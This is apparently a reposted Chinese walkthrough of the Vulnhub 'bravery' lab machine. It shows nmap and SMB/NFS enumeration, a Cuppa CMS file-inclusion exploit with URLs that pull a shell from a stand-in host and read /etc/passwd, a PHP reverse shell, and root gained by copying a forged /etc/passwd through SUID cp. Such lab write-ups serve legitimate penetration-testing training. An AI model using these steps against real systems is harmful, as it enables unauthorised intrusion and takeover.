OSCP-Vulnhub靶机记录-bravery-walkthrough
2022-9-24 16:10:15 Author: www.freebuf.com(查看原文) 阅读量:19 收藏

靶机地址

https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

安装靶机

v2-790d89187711aa2e4d07a359676e1d5d_1440w.jpg

打开kali,扫存活主机

nmap -sP 192.168.160.0/24

v2-fee17e3d999bac19f911abf805b0ec70_1440w.jpg

靶机ip

192.168.160.128

扫一波端口和服务:

./nmapAuto -H 192.168.160.128 -t All

PORT STATE SERVICE

22/tcp open ssh

53/tcp open domain

80/tcp open http

111/tcp open rpcbind

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

2049/tcp open nfs

3306/tcp open mysql

8080/tcp open http-proxy

20048/tcp open mountd

37904/tcp open unknown

43859/tcp open unknown

MAC Address: 00:0C:29:78:46:B7 (VMware)

Making a script scan on extra ports: 20048, 37904, 43859

PORT STATE SERVICE VERSION

20048/tcp open mountd 1-3 (RPC #100005)

37904/tcp open status 1 (RPC #100024)

43859/tcp open nlockmgr 1-4 (RPC #100021)

MAC Address: 00:0C:29:78:46:B7 (VMware)

8080/tcp open http nginx 1.12.2

|_http-open-proxy: Proxy might be redirecting requests

| http-robots.txt: 4 disallowed entries

|_/cgi-bin/ /qwertyuiop.html /private /public

|_http-server-header: nginx/1.12.2

|_http-title: Welcome to Bravery! This is SPARTA!

80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)

|_http-csrf: Couldn't find any CSRF vulnerabilities.

|_http-dombased-xss: Couldn't find any DOM based XSS.

| http-enum:

| /phpinfo.php: Possible information file

| /README.txt: Interesting, a readme.

| /icons/: Potentially interesting folder w/ directory listing

|_ /uploads/: Potentially interesting folder w/ directory listing

把上面的目录都翻了一遍,找到可利用信息

https://192.168.160.128/uploads/files/internal/department/procurement/sara/note.txt

v2-9a6e44ca42f7733e684e849480d84982_1440w.jpg

提示我们,用的是cuppaCMS

搜一下历史漏洞

v2-5efa70df4742d1e4daa4f12e3f59f23e_1440w.jpgv2-6e758852c20ea7d2f6bb01f890fb41ca_1440w.jpg

进去看下:

#####################################################

EXPLOIT

#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

尝试拼接目录,页面不存在

v2-02e57f599fe051f445084ccebb3bbd0f_1440w.jpg

绝对路径还是不对,前面的脚本都没有爆破出目录,网页报错也没爆出来,这条路先放弃

再看前面的扫描结果,445和2049,smb和nfs服务

[0;33mStarting smbmap scan

[0m

[\] Working on it...

[+] Guest session IP: 192.168.160.128:445 Name: 192.168.160.128

[|] Working on it...

[/] Working on it...

[-] Working on it...

[\] Working on it...

[|] Working on it...

[/] Working on it...

[-] Working on it...

Disk Permissions Comment

---- ----------- -------

anonymous READ ONLY

secured NO ACCESS

IPC$ NO ACCESS IPC Service (Samba Server 4.7.1)

[0m

[0;33mFinished smbmap scan

挂载anonymous,翻一下里面有什么

v2-2353eced3d9925d475e855a346490b9f_1440w.jpgv2-5146f97dec4d523e42d6302047e97a14_1440w.jpgv2-060789dd29cb0d8a6f901e8cc20a1d81_1440w.jpg

显然 genevieve,很有可能是这个cuppaCMS的管理员,所有用户名也收集一下,放到字典里,再fuzz一下目录:

v2-e20837d1ed4eb065b1cd37d1e32bf0e4_1440w.jpg

genevieve的页面就出来了(后来看其他人的wp,发现是挂载了nfs,找到登录另一个加密盘的明文密码,这也是一种办法)

v2-6b1bf08944dfdb2d86d20623b01e3677_1440w.jpg

到处点点看看,翻一番源码:

v2-dc8afc4151392cb031e34e1f5e8d42d4_1440w.jpg

找到cuppaCMS登录界面:

v2-37252b8fe7ae507ac443fc99a39d6f93_1440w.jpg

最关键的是,前面找不到的绝对路径爆出来了:

http://192.168.160.128/genevieve/cuppaCMS/index.php

尝试:

http://192.168.160.128/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

成功利用:

v2-fa428dcf83b2738b2851a3b3f4826b11_1440w.jpg

前面还可以弹phpreverseshell

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

直接用这个shell

修改完ip和端口,试一下:

v2-e6eaf34517b9018ae7cfeb2d01b9216d_1440w.jpgv2-99f6fac943629f65f6ab11f32f4c9f49_1440w.jpg

他上线了

id 是apache,需要进一步提权

v2-15045072f6ded2dfb4803b024e222cb2_1440w.jpg

这里使用SUID/cp提权https://blog.csdn.net/Z526209693/article/details/125480346

find / -perm -u=s -type f 2>/dev/null

v2-f05f8962affb479f931ed3e5cda937de_1440w.jpg

将靶机的etc/passwd 复制到kali,使用openssl,写入一个root用户 https://blog.csdn.net/qq_50854790/article/details/122769363

v2-b624b892d4017c048459fb916a8c2c75_1440w.jpg

root到手

v2-dd8a37ade69a7a65fbeeb09d539c88dd_1440w.jpg


文章来源: https://www.freebuf.com/articles/web/345518.html
如有侵权请联系:admin#unsafe.sh